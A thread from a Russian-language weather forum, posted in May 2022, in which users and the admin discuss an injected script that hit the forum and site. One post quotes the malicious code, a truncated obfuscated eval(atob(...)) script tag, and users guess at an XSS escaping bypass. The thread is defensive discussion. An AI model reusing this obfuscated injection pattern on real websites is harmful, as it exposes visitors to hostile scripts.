Добро пожаловать на Метеофорум!

Автор Kostian, 02 февраля 2014, 01:42:24

« назад - далее »

Paxan96

Хакер что взломал сайт и ранее взламывал метеоклуб один и тот же, или это разные

Mesocyclon

#556
Видать кому-то стало нечего делать  :-X

А вот и сам вредоносный код:

<script>eval(decodeURIComponent(atob("JTBBJTJGJTJGJTIwJTNEJTNEVXNlclNjcmlwdCUzRCUzRCUwQSUyRiUyRiUyMCU0MG5hbWUlMjAlMj.....</script>

qwerty

Еле-еле сюда зашёл.

Похоже, что вставили скрипт на главную страницу форума.
Приехали...


Paxan96

Цитата: Winter_storm от 21 мая 2022, 20:48:03
Еле-еле сюда зашёл.

Похоже, что вставили скрипт на главную страницу форума.
Сайта тоже.

Alter

Надо ждать, пока костян вычистит этот чудо-скрипт с сайта, а пока только отключение жс помогает.

Paxan96

Цитата: Alter от 21 мая 2022, 22:06:13
Надо ждать, пока костян вычистит этот чудо-скрипт с сайта, а пока только отключение жс помогает.
А как он мог прописаться?

Vasilii

Цитата: Paxan96 от 21 мая 2022, 22:39:03
А как он мог прописаться?
Вон создатель лурка закрыл свой сайт, может и Костян решил сделать определённый жест, хотя бы на несколько часиков :)

Alter

Цитата: Paxan96 от 21 мая 2022, 22:39:03
Цитата: Alter от 21 мая 2022, 22:06:13
Надо ждать, пока костян вычистит этот чудо-скрипт с сайта, а пока только отключение жс помогает.
А как он мог прописаться?
Лень писать много, есть статья, где в простых словах описано, что это такое.
https://www.google.com/amp/s/habr.com/ru/amp/post/511318/

Spasatel

Я в старом Internet Explorer захожу и никакой сирены :)
Вообще все нормально, никакой скрипт на него не действует.

Kostian

Проблему временно локализовал, отключив строчки кода, в которых происходило внедрение скрипта.  Утром буду дальше разбираться.
Тепла в октябре не дождался. Ноябрь не оправдал ожиданий. Жду холодный декабрь!!!

Paxan96

Теперь в некоторых темах эта хрень началась.

Alter

Код вставляется все время после такого элемента
<a id="c1">
Сразу в следующий за ним элемент внедряется.

Kostian

Так, ну на данный момент вывод этого скрипта на страницах я заблокировал.  Пока что он мешать не будет.  Осталось только найти, где и как он был внедрен.
Тепла в октябре не дождался. Ноябрь не оправдал ожиданий. Жду холодный декабрь!!!

Alter

#568
Это общая xss уязвимость, этот символ позволяет обойти экранирование. Похоже, надо менять id категорий на какой-нибудь "cat1", чтобы избежать данной проблемы.

Kostian

Alter

Код не только на форуме, но и на страницах сайта был внедрен в title. Так что тут не все так просто.
Тепла в октябре не дождался. Ноябрь не оправдал ожиданий. Жду холодный декабрь!!!